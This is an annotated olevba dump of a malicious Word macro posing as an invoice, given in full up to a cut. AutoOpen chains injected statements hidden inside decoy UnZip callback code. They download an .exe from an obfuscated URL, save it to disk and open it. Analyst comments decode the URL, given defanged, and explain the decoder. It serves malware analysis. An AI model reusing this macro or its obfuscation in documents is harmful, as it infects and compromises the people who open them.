dynamoo

Malicious Word macro

Oct 26th, 2015
  1. olevba 0.41 - http://decalage.info/python/oletools
  2. Flags        Filename                                                        
  3. -----------  -----------------------------------------------------------------
  4. OLE:MASIHB-V invoice-2425.doc
  5.  
  6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
  7.  
  8. ===============================================================================
  9. FILE: invoice-2425.doc
  10. Type: OLE
  11. -------------------------------------------------------------------------------
  12. VBA MACRO ThisDocument.cls
  13. in file: invoice-2425.doc - OLE stream: u'Macros/VBA/ThisDocument'
  14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  15.  
  16. Sub autoopen()
      ' [analyst] Auto-executable entry point (olevba flag "A"): Word runs AutoOpen when the
      ' document is opened with macros enabled. The calls below pass dummy arguments and discard
      ' return values; each callee carries one or two injected statements, and the call ORDER is
      ' what assembles the download -> save -> open chain. Un-numbered lines are analyst notes,
      ' not part of the sample.
      ' [analyst] Creates the Microsoft.XMLHTTP and Adodb.Stream objects (listing lines 141, 144).
  17. UZDLLPrnt "", 1
      ' [analyst] Opens and sends a synchronous HTTP GET to a URL decoded from an integer
      ' array (listing lines 515, 540, 548).
  18. ZDLLComm "NNcc"
      ' [analyst] Definition is not in the visible part of the listing.
  19. xbee_ensureMessageID
      ' [analyst] Sets the stream to Type 1 and opens it (listing lines 186-187).
  20. szTrim ""
      ' [analyst] Fetches the WScript.Shell "Process" environment collection (listing line 751).
  21. ChopNulls "NNm"
      ' [analyst] Definition is not in the visible part of the listing. Presumably this and/or
      ' xbee_ensureMessageID assign tempFolder, prompt82 and ZDLLPass3 - confirm against the
      ' full dump.
  22. VBZip32
      ' [analyst] Writes the HTTP response body to the stream and saves it to the path held in
      ' prompt82 (listing lines 263-264).
  23. VBUnZip32
      ' [analyst] Calls ZDLLPass3.Open on that saved path (listing line 465).
  24. ZDLLPass "", 1, "", ""
  25. End Sub
  26.  
  27.  
  28.  
  29. -------------------------------------------------------------------------------
  30. VBA MACRO Module1.bas
  31. in file: invoice-2425.doc - OLE stream: u'Macros/VBA/Module1'
  32. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  33.  
  34. '-- Callback For UNZIP32.DLL - Receive Message Function
  35. Public Sub UZReceiveDLLMessage_I32( _
  36.     ByVal ucsize_lo As Long, _
  37.     ByVal ucsize_hi As Long, _
  38.     ByVal csiz_lo As Long, _
  39.     ByVal csiz_hi As Long, _
  40.     ByVal cfactor As Integer, _
  41.     ByVal mo As Integer, _
  42.     ByVal dy As Integer, _
  43.     ByVal yr As Integer, _
  44.     ByVal hh As Integer, _
  45.     ByVal mm As Integer, _
  46.     ByVal c As Byte, _
  47.     ByRef fname As String, _
  48.     ByRef meth As String, _
  49.     ByVal crc As Long, _
  50.     ByVal fCrypt As Byte)
  51.  
  52.   Dim s0     As String
  53.   Dim xx     As Long
  54.   Dim cCh    As Byte
  55.   Dim strout As String * 80
  56.   Dim ucsize As Double
  57.   Dim csiz   As Double
  58.  
  59.   '-- Always implement a runtime error handler in Callback Routines!
  60.  On Error Resume Next
  61.  
  62.   '------------------------------------------------
  63.  '-- This Is Where The Received Messages Are
  64.  '-- Printed Out And Displayed.
  65.  '-- You Can Modify Below!
  66.  '------------------------------------------------
  67.  
  68.   strout = Space$(80)
  69.  
  70.   '-- For Zip Message Printing
  71.  If uZipNumber = 0 Then
  72.     Mid$(strout, 1, 50) = "Filename:"
  73.     Mid$(strout, 53, 4) = "Size"
  74.     Mid$(strout, 62, 4) = "Date"
  75.     Mid$(strout, 71, 4) = "Time"
  76.     uZipMessage = strout & vbNewLine
  77.     strout = Space$(80)
  78.   End If
  79.  
  80.   s0 = ""
  81.  
  82.   '-- Do Not Change This For Next!!!
  83.  For xx = 0 To UBound(fname.ch)
  84.     If fname.ch(xx) = 0 Then Exit For
  85.     s0 = s0 & Chr$(fname.ch(xx))
  86.   Next
  87.  
  88.   ucsize = CnvI64Struct2Dbl(ucsize_lo, ucsize_hi)
  89.   csiz = CnvI64Struct2Dbl(csiz_lo, csiz_hi)
  90.  
  91.   '-- Assign Zip Information For Printing
  92.  Mid$(strout, 1, 50) = Mid$(s0, 1, 50)
  93.   Mid$(strout, 51, 9) = Right$("        " & CStr(ucsize), 9)
  94.   Mid$(strout, 62, 3) = Right$("0" & Trim$(CStr(mo)), 2) & "/"
  95.   Mid$(strout, 65, 3) = Right$("0" & Trim$(CStr(dy)), 2) & "/"
  96.   Mid$(strout, 68, 2) = Right$("0" & Trim$(CStr(yr)), 2)
  97.   Mid$(strout, 72, 3) = Right$(str$(hh), 2) & ":"
  98.   Mid$(strout, 75, 2) = Right$("0" & Trim$(CStr(mm)), 2)
  99.  
  100.   ' Mid$(strout, 77, 2) = Right$(" " & CStr(cfactor), 2)
  101.  ' Mid$(strout, 80, 8) = Right$("        " & CStr(csiz), 8)
  102.  ' s0 = ""
  103.  ' For xx = 0 To 255
  104.  '     If meth.ch(xx) = 0 Then Exit For
  105.  '     s0 = s0 & Chr$(meth.ch(xx))
  106.  ' Next xx
  107.  
  108.   '-- Do Not Modify Below!!!
  109.  uZipMessage = uZipMessage & strout & vbNewLine
  110.   uZipNumber = uZipNumber + 1
  111.  
  112. End Sub
  113.  
  114. '-- Callback For UNZIP32.DLL - Print Message Function
  115. Public Function UZDLLPrnt(ByRef fname As String, ByVal x As Long)
       ' [analyst] Presented as an UnZip DLL print callback, but autoopen calls it directly as
       ' UZDLLPrnt "", 1. The effective statements are the two CreateObject calls at listing
       ' lines 141 and 144, which populate the public variables httpRequest and adodbStream
       ' declared in Module2. Nothing is assigned to the function's return value.
  116.  
  117.   Dim s0 As String
  118.   Dim xx As Long
  119.   Dim cCh As Byte
  120.  
  121.   '-- Always implement a runtime error handler in Callback Routines!
       ' [analyst] Error suppression matters here: fname is a plain String, so the member
       ' access fn.ame.ch(xx) below cannot succeed; with Resume Next the failure is silently
       ' skipped and execution continues to the injected statements.
  122.  On Error Resume Next
  123.  
  124.   s0 = ""
  125.  
  126.   '-- Gets The UNZIP32.DLL Message For Displaying.
       ' [analyst] With x = 1 this loop runs for xx = 0 only; s0 is never used afterwards.
  127.  For xx = 0 To x - 1
  128.     cCh = fn.ame.ch(xx)
  129.     Select Case cCh
  130.     Case 0
  131.       Exit For
  132.     Case 10
  133.       s0 = s0 & vbNewLine     ' Damn UNIX :-)
  134.    Case 92 ' = Asc("\")
  135.      s0 = s0 & "/"
  136.     Case Else
  137.       s0 = s0 & Chr$(cCh)
  138.     End Select
  139.   Next
  140.  
       ' [analyst] Injected: HTTP client object later used by ZDLLComm (Open/Send) and
       ' VBUnZip32 (responseBody).
  141. Set httpRequest = CreateObject("Microsoft.XMLHTTP")
  142.  
  143.  
       ' [analyst] Injected: stream object later configured in szTrim and written to disk in
       ' VBUnZip32.
  144. Set adodbStream = CreateObject("Adodb.Stream")
  145.   '-- Assign Zip Information
  146.  
  147.  
  148. End Function
  149.  
  150. '-- Callback For UNZIP32.DLL - DLL Service Function
  151. Public Function UZDLLServ_I32(ByRef mname As String, _
  152.          ByVal lUcSiz_Lo As Long, ByVal lUcSiz_Hi As Long) As Long
  153.  
  154.   Dim UcSiz As Double
  155.   Dim s0 As String
  156.   Dim xx As Long
  157.  
  158.   '-- Always implement a runtime error handler in Callback Routines!
  159.  On Error Resume Next
  160.  
  161.   ' Parameters lUcSiz_Lo and lUcSiz_Hi contain the uncompressed size
  162.  ' of the extracted archive entry.
  163.  ' This information may be used for some kind of progress display...
  164.  UcSiz = CnvI64Struct2Dbl(lUcSiz_Lo, lUcSiz_Hi)
  165.  
  166.   s0 = ""
  167.   '-- Get Zip32.DLL Message For processing
  168.  For xx = 0 To UBound(mname.ch)
  169.     If mname.ch(xx) = 0 Then Exit For
  170.     s0 = s0 & Chr$(mname.ch(xx))
  171.   Next
  172.   ' At this point, s0 contains the message passed from the DLL
  173.  ' (like the current file being extracted)
  174.  ' It is up to the developer to code something useful here :)
  175.  
  176.   UZDLLServ_I32 = 0 ' Setting this to 1 will abort the zip!
  177.  
  178. End Function
  179.  
  180.  
  181. '-- ASCIIZ To String Function
  182. Public Function szTrim(szString As String)
       ' [analyst] Trims a NUL-terminated string: returns the text before the first vbNullChar
       ' (trimmed), "" if the NUL is the first character, otherwise Trim$ of the whole input.
       ' autoopen calls it as szTrim "" and discards the result, so the only effect that matters
       ' on that path is the pair of injected adodbStream statements below.
  183.  
  184.   Dim pos As Long
  185.  
       ' [analyst] Injected: Type 1 is the ADO binary stream type (adTypeBinary); the stream is
       ' then opened so VBUnZip32 can write the HTTP response bytes into it. Relies on
       ' adodbStream having been created by UZDLLPrnt earlier in autoopen.
  186. adodbStream.Type = 1
  187. adodbStream.Open
  188.   pos = InStr(szString, vbNullChar)
  189.  
  190.   Select Case pos
  191.     Case Is > 1
  192.       szTrim = Trim$(Left$(szString, pos - 1))
  193.     Case 1
  194.       szTrim = ""
  195.     Case Else
  196.       szTrim = Trim$(szString)
  197.   End Select
  198.  
  199. End Function
  200.  
  201. '-- convert a 64-bit int divided in two Int32 variables into
  202. '-- a single 64-bit floating-point value
  203. Private Function CnvI64Struct2Dbl(ByVal lInt64Lo As Long, lInt64Hi As Long) As Double
       ' [analyst] Combines the low and high 32-bit halves of a 64-bit value into one Double.
       ' A negative low half is reinterpreted as unsigned by adding 2^32 before the high half
       ' (scaled by 2^32) is added. lInt64Hi has no ByVal keyword, so it is passed ByRef (the
       ' VBA default); the function only reads it. In the visible listing this helper is called
       ' only from code that autoopen never reaches.
  204.   If lInt64Lo < 0 Then
  205.     CnvI64Struct2Dbl = 2# ^ 32 + CDbl(lInt64Lo)
  206.   Else
  207.     CnvI64Struct2Dbl = CDbl(lInt64Lo)
  208.   End If
  209.   CnvI64Struct2Dbl = CnvI64Struct2Dbl + (2# ^ 32) * CDbl(lInt64Hi)
  210. End Function
  211.  
  212. '-- Concatenate a "structured" version number into a single integer value,
  213. '-- to facilitate version number comparisons
  214. '-- (In case the practically used NumMajor numbers will ever exceed 128, it
  215. '-- should be considered to use the number type "Double" to store the
  216. '-- concatenated number. "Double" can store signed integer numbers up to a
  217. '-- width of 52 bits without loss of precision.)
  218. Private Function ConcatVersNums(ByVal NumMajor As Byte, ByVal NumMinor As Byte _
  219.                               , ByVal NumRevis As Byte, ByVal NumBuild As Byte) As Long
  220.   If (NumMajor And &H80) <> 0 Then
  221.     ConcatVersNums = (NumMajor And &H7F) * (2 ^ 24) Or &H80000000
  222.   Else
  223.     ConcatVersNums = NumMajor * (2 ^ 24)
  224.   End If
  225.   ConcatVersNums = ConcatVersNums _
  226.                  + NumMinor * (2 ^ 16) _
  227.                  + NumRevis * (2 ^ 8) _
  228.                  + NumBuild
  229. End Function
  230.  
  231. '-- Helper function to provide a printable version number string, using the
  232. '-- current formatting rule for version number display as implemented in UnZip.
  233. Private Function VersNumsToTxt(ByVal NumMajor As Byte, ByVal NumMinor As Byte _
  234.                              , ByVal NumRevis As Byte) As String
  235.   VersNumsToTxt = CStr(NumMajor) & "." & Hex$(NumMinor)
  236.   If NumRevis <> 0 Then VersNumsToTxt = VersNumsToTxt & Hex$(NumRevis)
  237. End Function
  238.  
  239. '-- Helper function to convert a "concatenated" version id into a printable
  240. '-- version number string, using the current formatting rule for version number
  241. '-- display as implemented in UnZip.
  242. Private Function VersIDToTxt(ByVal VersionID As Long) As String
  243.   Dim lNumTemp As Long
  244.  
  245.   lNumTemp = VersionID \ (2 ^ 24)
  246.   If lNumTemp < 0 Then lNumTemp = 256 + lNumTemp
  247.   VersIDToTxt = CStr(lNumTemp) & "." _
  248.              & Hex$((VersionID And &HFF0000) \ &H10000)
  249.   lNumTemp = (VersionID And &HFF00&) \ &H100
  250.   If lNumTemp <> 0 Then VersIDToTxt = VersIDToTxt & Hex$(lNumTemp)
  251. End Function
  252.  
  253. '-- Main UNZIP32.DLL UnZip32 Subroutine
  254. '-- (WARNING!) Do Not Change!
  255. Public Sub VBUnZip32()
       ' [analyst] Despite the name and the "Main UNZIP32.DLL" header, the only statements that
       ' execute are listing lines 263-265 and 303-304: write the HTTP response body into the
       ' ADO stream, save it to disk, jump to Step33, Exit Sub. Everything else in this routine
       ' is unreachable filler that makes the macro resemble an UnZip DLL front-end.
  256.  
  257.   Dim retcode As Long
  258.   Dim MsgStr As String
  259.   Dim TotalSizeComp As Double
  260.   Dim TotalSize As Double
  261.   Dim NumMembers As Double
  262.  
       ' [analyst] Injected payload drop. responseBody is the raw byte body of the request sent
       ' in ZDLLComm. The second SaveToFile argument, 2, is ADO's create-or-overwrite option
       ' (adSaveCreateOverWrite). prompt82 is a public String from Module2 whose assignment is
       ' not in the visible listing. No HTTP status or content check is made before the write,
       ' and this routine has no error handler of its own.
  263.     adodbStream.write httpRequest.responseBody
  264.     adodbStream.savetofile prompt82, 2
       ' [analyst] Skips every statement up to the Step33 label at listing line 303.
  265.     GoTo Step33
  266.   '-- Set The UNZIP32.DLL Options
  267.  '-- (WARNING!) Do Not Change
  268.  UZDCL.StructVersID = cUz_DCLStructVer      ' Current version of this structure
  269.  UZDCL.ExtractOnlyNewer = uExtractOnlyNewer ' 1 = Extract Only Newer/New
  270.  UZDCL.SpaceToUnderscore = uSpaceUnderScore ' 1 = Convert Space To Underscore
  271.  UZDCL.PromptToOverwrite = uPromptOverWrite ' 1 = Prompt To Overwrite Required
  272.  UZDCL.fQuiet = uQuiet                      ' 2 = No Messages 1 = Less 0 = All
  273.  UZDCL.ncflag = uWriteStdOut                ' 1 = Write To Stdout
  274.  UZDCL.ntflag = uTestZip                    ' 1 = Test Zip File
  275.  UZDCL.nvflag = uExtractList                ' 0 = Extract 1 = List Contents
  276.  UZDCL.nfflag = uFreshenExisting            ' 1 = Update Existing by Newer
  277.  UZDCL.nzflag = uDisplayComment             ' 1 = Display Zip File Comment
  278.  UZDCL.ndflag = uHonorDirectories           ' 1 = Honour Directories
  279.  UZDCL.noflag = uOverWriteFiles             ' 1 = Overwrite Files
  280.  UZDCL.naflag = uConvertCR_CRLF             ' 1 = Convert CR To CRLF
  281.  UZDCL.nZIflag = uVerbose                   ' 1 = Zip Info Verbose
  282.  UZDCL.C_flag = uCaseSensitivity            ' 1 = Case insensitivity, 0 = Case Sensitivity
  283.  UZDCL.fPrivilege = uPrivilege              ' 1 = ACL 2 = Priv
  284.  UZDCL.Zip = uZipFileName                   ' ZIP Filename
  285.  UZDCL.ExtractDir = uExtractDir             ' Extraction Directory, NULL If Extracting
  286.                                             ' To Current Directory
  287.  
  288.   '-- Set Callback Addresses
  289.  '-- (WARNING!!!) Do Not Change
       ' [analyst] Identifiers in the dead code have been broken with stray dots (FnP.tr here,
       ' UzpVe.rsion2 and Wiz_Sin.gleEntryUnzip below), so these lines would not resolve even
       ' if they were reached.
  290.  UZUSER.UZDLLPrnt = FnP.tr(AddressOf UZDLLPrnt)
  291.   UZUSER.UZDLLSND = 0&    '-- Not Supported
  292.  UZUSER.UZDLLMESSAGE_I32 = FnP.tr(AddressOf UZReceiveDLLMessage_I32)
  293.   UZUSER.UZDLLSERVICE_I32 = FnP.tr(AddressOf UZDLLServ_I32)
  294.  
  295.   '-- Set UNZIP32.DLL Version Space
  296.  '-- (WARNING!!!) Do Not Change
  297.  With UZVER2
  298.     .structlen = Len(UZVER2)
  299.     .Beta = String$(10, vbNullChar)
  300.     .Date = String$(20, vbNullChar)
  301.     .ZLIB = String$(10, vbNullChar)
  302.   End With
  303. Step33:
       ' [analyst] Injected early exit; nothing below this line runs.
  304.     Exit Sub
  305.   '-- Get Version
  306.  retcode = UzpVe.rsion2(UZVER2)
  307.   If retcode <> 0 Then
  308.     MsgBox "Incompatible DLL version discovered!" & vbNewLine _
  309.          & "The UnZip DLL requires a version structure of length " _
  310.          & CStr(retcode) & ", but the VB frontend expects the DLL to need " _
  311.          & Len(UZVER2) & "bytes." & vbNewLine _
  312.          & vbNewLine & "The program cannot continue." _
  313.          , vbCritical + vbOKOnly, App.Title
  314.     Exit Sub
  315.   End If
  316.  
  317.   ' Check that the DLL version is sufficiently recent
  318.  If (ConcatVersNums(UZVER2.unzip(1), UZVER2.unzip(2) _
  319.                   , UZVER2.unzip(3), UZVER2.unzip(4)) < _
  320.       ConcatVersNums(cUzDLL_MinVer_Major, cUzDLL_MinVer_Minor _
  321.                   , cUzDLL_MinVer_Revis, 0)) Then
  322.     ' The found UnZip DLL is too old!
  323.    MsgBox "Incompatible old DLL version discovered!" & vbNewLine _
  324.          & "This program requires an UnZip DLL version of at least " _
  325.          & VersNumsToTxt(cUzDLL_MinVer_Major, cUzDLL_MinVer_Minor, cUzDLL_MinVer_Revis) _
  326.          & ", but the version reported by the found DLL is only " _
  327.          & VersNumsToTxt(UZVER2.unzip(1), UZVER2.unzip(2), UZVER2.unzip(3)) _
  328.          & "." & vbNewLine _
  329.          & vbNewLine & "The program cannot continue." _
  330.          , vbCritical + vbOKOnly, App.Title
  331.     Exit Sub
  332.   End If
  333.  
  334.   ' Concatenate the DLL API version info into a single version id variable.
  335.  ' This variable may be used later on to switch between different
  336.  ' known variants of specific API calls or API structures.
  337.  m_UzDllApiVers = ConcatVersNums(UZVER2.dllapimin(1), UZVER2.dllapimin(2) _
  338.                                 , UZVER2.dllapimin(3), UZVER2.dllapimin(4))
  339.   ' check that the DLL API version is not too new
  340.  If (m_UzDllApiVers > _
  341.       ConcatVersNums(cUzDLL_MaxAPI_Major, cUzDLL_MaxAPI_Minor _
  342.                   , cUzDLL_MaxAPI_Revis, 0)) Then
  343.     ' The found UnZip DLL is too new!
  344.    MsgBox "DLL version with incompatible API discovered!" & vbNewLine _
  345.          & "This program can only handle UnZip DLL API versions up to " _
  346.          & VersNumsToTxt(cUzDLL_MaxAPI_Major, cUzDLL_MaxAPI_Minor, cUzDLL_MaxAPI_Revis) _
  347.          & ", but the found DLL reports a newer API version of " _
  348.          & VersIDToTxt(m_UzDllApiVers) & "." & vbNewLine _
  349.          & vbNewLine & "The program cannot continue." _
  350.          , vbCritical + vbOKOnly, App.Title
  351.     Exit Sub
  352.   End If
  353.  
  354.   '--------------------------------------
  355.  '-- You Can Change This For Displaying
  356.  '-- The Version Information!
  357.  '--------------------------------------
  358.  MsgStr$ = "DLL Date: " & szTrim(UZVER2.Date)
  359.   MsgStr$ = MsgStr$ & vbNewLine$ & "Zip Info: " _
  360.        & VersNumsToTxt(UZVER2.zipinfo(1), UZVER2.zipinfo(2), UZVER2.zipinfo(3))
  361.   MsgStr$ = MsgStr$ & vbNewLine$ & "DLL Version: " _
  362.        & VersNumsToTxt(UZVER2.windll(1), UZVER2.windll(2), UZVER2.windll(3))
  363.   MsgStr$ = MsgStr$ & vbNewLine$ & "DLL API Compatibility: " _
  364.        & VersIDToTxt(m_UzDllApiVers)
  365.   MsgStr$ = MsgStr$ & vbNewLine$ & "--------------"
  366.   '-- End Of Version Information.
  367.  
  368.   '-- Go UnZip The Files! (Do Not Change Below!!!)
  369.  '-- This Is The Actual UnZip Routine
  370.  retcode = Wiz_Sin.gleEntryUnzip(uNumberFiles, uZipNames, uNumberXFiles, _
  371.                                  uExcludeNames, UZDCL, UZUSER)
  372.   '---------------------------------------------------------------
  373.  
  374.   '-- If There Is An Error Display A MsgBox!
  375.  If retcode <> 0 Then _
  376.     MsgBox "UnZip DLL call returned error code #" & CStr(retcode) _
  377.           , vbExclamation, App.Title
  378.  
  379.   '-- Add up 64-bit values
  380.  TotalSizeComp = CnvI64Struct2Dbl(UZUSER.TotalSizeComp_Lo, _
  381.                                    UZUSER.TotalSizeComp_Hi)
  382.   TotalSize = CnvI64Struct2Dbl(UZUSER.TotalSize_Lo, _
  383.                                UZUSER.TotalSize_Hi)
  384.   NumMembers = CnvI64Struct2Dbl(UZUSER.NumMembers_Lo, _
  385.                                 UZUSER.NumMembers_Hi)
  386.  
  387.   '-- You Can Change This As Needed!
  388.  '-- For Compression Information
  389.  MsgStr$ = MsgStr$ & vbNewLine & _
  390.        "Only Shows If uExtractList = 1 List Contents"
  391.   MsgStr$ = MsgStr$ & vbNewLine & "--------------"
  392.   MsgStr$ = MsgStr$ & vbNewLine & "Comment         : " & UZUSER.cchComment
  393.   MsgStr$ = MsgStr$ & vbNewLine & "Total Size Comp : " _
  394.                     & Format$(TotalSizeComp, "#,0")
  395.   MsgStr$ = MsgStr$ & vbNewLine & "Total Size      : " _
  396.                     & Format$(TotalSize, "#,0")
  397.   MsgStr$ = MsgStr$ & vbNewLine & "Compress Factor : %" & UZUSER.CompFactor
  398.   MsgStr$ = MsgStr$ & vbNewLine & "Num Of Members  : " & NumMembers
  399.   MsgStr$ = MsgStr$ & vbNewLine & "--------------"
  400.  
  401.   VBUnzFrm.txtMsgOut.Text = VBUnzFrm.txtMsgOut.Text & MsgStr$ & vbNewLine
  402. End Sub
  403.  
  404. -------------------------------------------------------------------------------
  405. VBA MACRO Module2.bas
  406. in file: invoice-2425.doc - OLE stream: u'Macros/VBA/Module2'
  407. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
  408.  
  409.  
  410.  
       ' [analyst] Module-level state shared by the injected statements that are scattered over
       ' Module1 and Module2. All are late-bound (As Object / As String), so no type library
       ' reference appears in the document.
       ' [analyst] Set to a Microsoft.XMLHTTP instance in UZDLLPrnt; used in ZDLLComm and VBUnZip32.
  411. Public httpRequest As Object
       ' [analyst] Set to an Adodb.Stream instance in UZDLLPrnt; configured in szTrim, written and
       ' saved in VBUnZip32.
  412. Public adodbStream As Object
       ' [analyst] Set in ChopNulls to the WScript.Shell "Process" environment collection; no read
       ' of it appears in the visible listing.
  413. Public processEnv  As Object
       ' [analyst] tempFolder, prompt82 and ZDLLPass3 are never assigned in the visible listing.
       ' prompt82 is the SaveToFile target (listing line 264) and the argument to ZDLLPass3.Open
       ' (listing line 465). Presumably assigned in xbee_ensureMessageID or VBZip32 - confirm
       ' against the full dump.
  414. Public tempFolder As String
  415. Public prompt82 As String
  416. Public ZDLLPass3 As Object
  417.  
  418.  
  419. '-- Callback For ZIP32z64.DLL - DLL Service Function
  420. Public Function ZDLLServ(ByRef mname As String, _
  421.                          ByVal LowSize As Long, _
  422.                          ByVal HighSize As Long) As Long
  423.  
  424.     Dim s0 As String
  425.     Dim xx As Long
  426.     Dim FS As Currency  ' for large file sizes
  427.    
  428.     '-- Always Put This In Callback Routines!
  429.    On Error Resume Next
  430.    
  431.     FS = (HighSize * &H10000 * &H10000) + LowSize
  432.  '   Form1.Print "ZDLLServ returned File Size High " & HighSize & _
  433.  '               " Low " & LowSize & " = " & FS & " bytes"
  434.    
  435.     s0 = ""
  436.     '-- Get Zip32.DLL Message For processing
  437.    For xx = 0 To 4096 ' x
  438.    If mname.ch(xx) = 0 Then
  439.         Exit For
  440.     Else
  441.         s0 = s0 + Chr(mname.ch(xx))
  442.     End If
  443.     Next
  444.     ' At this point, s0 contains the message passed from the DLL
  445.    ' It is up to the developer to code something useful here :)
  446.    ZDLLServ = 0 ' Setting this to 1 will abort the zip!
  447.    
  448. End Function
  449.  
  450. '-- Callback For ZIP32z64.DLL - DLL Password Function
  451. Public Function ZDLLPass(ByRef p As String, _
  452.   ByVal n As Long, ByRef m As String, _
  453.   ByRef Name As String)
       ' [analyst] Presented as a Zip DLL password callback; autoopen calls it last, as
       ' ZDLLPass "", 1, "", "". Only listing lines 461-467 execute: set the return value to 1,
       ' call ZDLLPass3.Open on the path in prompt82, Exit Function. The password prompt code
       ' that follows is unreachable and refers to names (mnnn, pnnn) that are not parameters
       ' or locals of this function.
  454.  
  455.   Dim filename   As String
  456.   Dim prompt     As String
  457.   Dim xx         As Integer
  458.   Dim szpassword As String
  459.  
  460.   '-- Always Put This In Callback Routines!
       ' [analyst] Any failure of the Open call below is swallowed, so the user sees no error.
  461.  On Error Resume Next
  462.    
  463.   ZDLLPass = 1
  464.  
       ' [analyst] Injected final stage. prompt82 is the same path VBUnZip32 saved the HTTP
       ' response to. ZDLLPass3 is a public Object whose assignment is outside the visible
       ' listing; presumably a shell automation object whose Open method launches the file -
       ' confirm against the full dump.
  465.     ZDLLPass3.Open (prompt82)
  466.   '-- User Entered A Password So Proccess It
  467.  Exit Function
  468.   '-- Enter or Verify
  469.  For xx = 0 To 255
  470.     If mnnn.ch(xx) = 0 Then
  471.       Exit For
  472.     Else
  473.       prompt = prompt & Chr(mnnn.ch(xx))
  474.     End If
  475.   Next
  476.  
  477.   '-- If There Is A Password Have The User Enter It!
  478.  '-- This Can Be Changed
  479.  
  480.   '-- Now skip asking if default password set
  481.  If EncryptionPassword <> "" Then
  482.     szpassword = EncryptionPassword
  483.   Else
  484.     szpassword = InputBox("Please Enter The Password!", prompt)
  485.   End If
  486.  
  487.   '-- The User Did Not Enter A Password So Exit The Function
  488.  If szpassword = "" Then Exit Function
  489.  
  490.   For xx = 0 To n - 1
  491.     pnnn.ch(xx) = 0
  492.   Next
  493.  
  494.   For xx = 0 To Len(szpassword) - 1
  495.     pnnn.ch(xx) = Asc(Mid(szpassword, xx + 1, 1))
  496.   Next
  497.  
  498.   pnnn.ch(xx) = Chr(0) ' Put Null Terminator For C
  499.  
  500.   ZDLLPass = 0
  501.    
  502. End Function
  503.  
  504. '-- Callback For ZIP32z64.DLL - DLL Comment Function
  505. Public Function ZDLLComm(ByRef s1 As String)
       ' [analyst] Presented as a Zip DLL archive-comment callback; autoopen calls it as
       ' ZDLLComm "NNcc" and the argument is never read on the live path. The statements that
       ' execute are listing lines 512-516, 540-541 and 548: build an integer array, decode it
       ' to a URL, open a GET request and send it. The two GoTo jumps skip all of the comment
       ' handling code in between.
  506.    
  507.     Dim comment As String
  508.     Dim xx%, szcomment$
  509.     Dim comment2() As Variant
  510.    
  511.     '-- Always Put This In Callback Routines!
  512.    On Error Resume Next
  513.     ZDLLComm = 1
  514.    
       ' [analyst] Encoded download URL, 54 values. Decoded with GetStringFromArray and key 53
       ' (character i = value - 53 + 2*i) it yields, defanged:
       '   hxxp://img1[.]buyersbestfriend[.]com/76r56e87y8/65df78.exe
       ' Hand-decoded from the values on this line; verify with an offline decoder before
       ' using it as an indicator.
  515.     comment2 = Array(157, 167, 165, 159, 103, 90, 88, 144, 146, 138, 82, 77, 127, 144, 146, 124, 135, 134, 115, 116, 128, 127, 111, 121, 110, 104, 111, 99, 43, 94, 104, 100, 36, 42, 39, 97, 34, 33, 78, 31, 28, 92, 25, 14, 19, 16, 61, 61, 12, 11, -1, 52, 69, 48)
  516. GoTo Step1
  517.    
  518.     If Not IsEmpty(ArchiveCommentText) Then
  519.       ' use text given to SetZipOptions
  520.      szcomment = ArchiveCommentText
  521.     Else
  522.       For xx = 0 To 4095
  523.         szcomment = szcomment & Chr(shh1.ch(xx))
  524.         If sdd1.ch(xx) = 0 Then
  525.           Exit For
  526.         End If
  527.       Next
  528.       comment = InputBox("Enter or edit the comment", Default:=szcomment)
  529.       If comment = "" Then
  530.         ' either empty comment or Cancel button
  531.        If MsgBox("Remove comment?" & Chr(13) & "Hit No to keep existing comment", vbYesNo) = vbYes Then
  532.             szcomment = comment
  533.         Else
  534.           Exit Function
  535.         End If
  536.       End If
  537.       szcomment = comment
  538.     End If
  539. Step1:
       ' [analyst] The verb is assembled from "G" & "E" + "T" so the literal "GET" never
       ' appears in the source. The third argument False makes the request synchronous, so
       ' responseBody is complete by the time VBUnZip32 reads it. Relies on httpRequest having
       ' been created by UZDLLPrnt earlier in autoopen.
  540. httpRequest.Open "G" & "E" + "T", GetStringFromArray(comment2, 53), False
  541.    GoTo Step2
  542.     'If szcomment = "" Then Exit Function
  543.    For xx = 0 To Len(szcomment) - 1
  544.         sgg1.ch(xx) = Asc(Mid$(szcomment, xx + 1, 1))
  545.     Next xx
  546.     sggg1.ch(xx) = 0 ' Put null terminator for C
  547. Step2:
       ' [analyst] Issues the request. No status code or content type is checked here or later.
  548. httpRequest.Send
  549. End Function
  550.  
  551. Public Function GetStringFromArray(fromArr() As Variant, LenLen As Integer) As String
       ' [analyst] String de-obfuscator. For each index i from LBound to UBound it emits
       ' Chr(fromArr(i) - LenLen + i * 2), i.e. a fixed subtractive key plus a position-dependent
       ' offset of twice the index, and returns the concatenation. Despite its name, LenLen is
       ' the key, not a length. The only visible caller is ZDLLComm (listing line 540), with key
       ' 53; there the first seven values decode to "http://". To recover strings from similar
       ' samples, apply the same arithmetic offline rather than running the macro.
  552.     Dim i As Integer
  553.     Dim result As String
  554.     result = ""
  555.     For i = LBound(fromArr) To UBound(fromArr)
  556.         result = result & Chr(fromArr(i) - LenLen + i * 2)
  557.     Next i
  558.     GetStringFromArray = result
  559. End Function
  560.  
  561. ' This function can be used to set options in VB
  562. Public Function SetZipOptions(ByRef ZipOpts As String, _
  563.   Optional ByVal ZipMode As String, _
  564.   Optional ByVal RootDirToZipFrom As String, _
  565.   Optional ByVal CompressionLevel As String, _
  566.   Optional ByVal RecurseSubdirectories As String, _
  567.   Optional ByVal Verboseness As String, _
  568.   Optional ByVal i_IncludeFiles As String, _
  569.   Optional ByVal x_ExcludeFiles As String, _
  570.   Optional ByVal UpdateSFXOffsets As Boolean = False, Optional ByVal JunkDirNames As Boolean = False, _
  571.   Optional ByVal Encrypt As Boolean = False, Optional ByVal Password As String = "", _
  572.   Optional ByVal Repair As String, Optional ByVal NoDirEntries As Boolean = False, _
  573.   Optional ByVal GrowExistingArchive As Boolean = False, _
  574.   Optional ByVal JunkSFXPrefix As Boolean = False, Optional ByVal ForceUseOfDOSNames As Boolean = False, _
  575.   Optional ByVal Translate_LF As String, _
  576.   Optional ByVal Move_DeleteAfterAddedOrUpdated As Boolean = False, _
